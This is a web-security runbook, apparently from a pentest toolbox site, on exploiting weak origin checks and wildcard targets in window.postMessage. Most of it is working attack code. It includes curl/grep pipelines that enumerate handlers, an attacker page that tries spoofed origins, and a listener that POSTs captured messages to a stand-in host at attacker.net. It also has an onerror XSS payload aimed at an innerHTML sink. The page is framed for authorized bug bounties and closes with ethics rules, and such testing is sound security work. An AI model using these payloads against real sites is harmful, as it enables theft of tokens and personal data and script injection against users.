Webupdated Oct 1, 2026

PostMessage Vulnerabilities

Exploiting weak origin checks and wildcard targets in window.postMessage to steal data or escalate to cross-site scripting.

toolbox:burp suitebrowser devtools

A postMessage runbook for bug bounty / authorized pentest on in-scope targets only. Goal: find a handler that trusts the wrong origin or sends to *, then prove you can read secrets or reach an XSS sink from an attacker-controlled page.

1. Enumerate handlers and senders

curl -s "https://target.com/" | grep -oE 'src="[^"]+\.js"' | cut -d'"' -f2 \
  | while read -r js; do
      curl -s "https://target.com/$js" \
        | grep -nE 'addEventListener\(.message|postMessage\('
    done

In DevTools, log all messages:

addEventListener("message", e => console.log("msg:", e.origin, e.data, e.source));

2. Test origin validation

<!-- attacker.html: iterate origins a weak check might accept -->
<script>
  const w = window.open("https://target.com/widget");
  const origins = ["https://target.com.evil.net",
                   "https://evil-target.com", "https://not.target.com", "null"];
  setTimeout(() => origins.forEach(o => w.postMessage({cmd:"ping"}, o)), 1500);
</script>

Weak checks in source: .includes("target.com"), .startsWith("target.com"), /target\.com/, or no check.

3. Wildcard targetOrigin

curl -s "https://target.com/app.js" | grep -nE 'postMessage\([^,]+,\s*["'\'']\*'

If a page sends tokens, PII, or session data to *, any embedding origin receives it.

4. Capture cross-origin replies

<script>
  addEventListener("message", e => {
    fetch("https://attacker.net/collect", {method:"POST", body: JSON.stringify(e.data)});
  });
  window.open("https://target.com/dashboard");
</script>
python3 -m http.server 8000

5. Push data into a sink

// If handler does out.innerHTML = JSON.parse(e.data).html
w.postMessage('{"html":"<img src=x onerror=alert(document.domain)>"}', "*");

Also check eval(e.data), location = e.data, document.write(e.data), and MessagePort adoption (e.ports[0]).

Full pipeline

# 1. Find scripts and messaging calls
curl -s "https://target.com/" | grep -oE 'src="[^"]+\.js"' | cut -d'"' -f2 \
  | while read -r js; do
      curl -s "https://target.com/$js" | grep -nE 'addEventListener\(.message|postMessage\('
    done

# 2. Grep for wildcard targetOrigin
curl -s "https://target.com/app.js" | grep -nE 'postMessage\([^,]+,\s*["'\'']\*'

# 3. Start a collector for exfil proof
python3 -m http.server 8000
<script>
addEventListener("message", e => console.log("leak:", e.origin, e.data));
const w = window.open("https://target.com/widget");
setTimeout(() => w.postMessage({cmd:"ping"}, "*"), 1500);
</script>

Ethics & legality

  • Only test origins you control against the in-scope target; never embed a third party.
  • Do not exfiltrate real user data — prove access with your own session and a benign canary.
  • Keep PoCs on a local or authorized host, not on public infrastructure.
  • Report the exact origin-check bug with a minimal reproduction.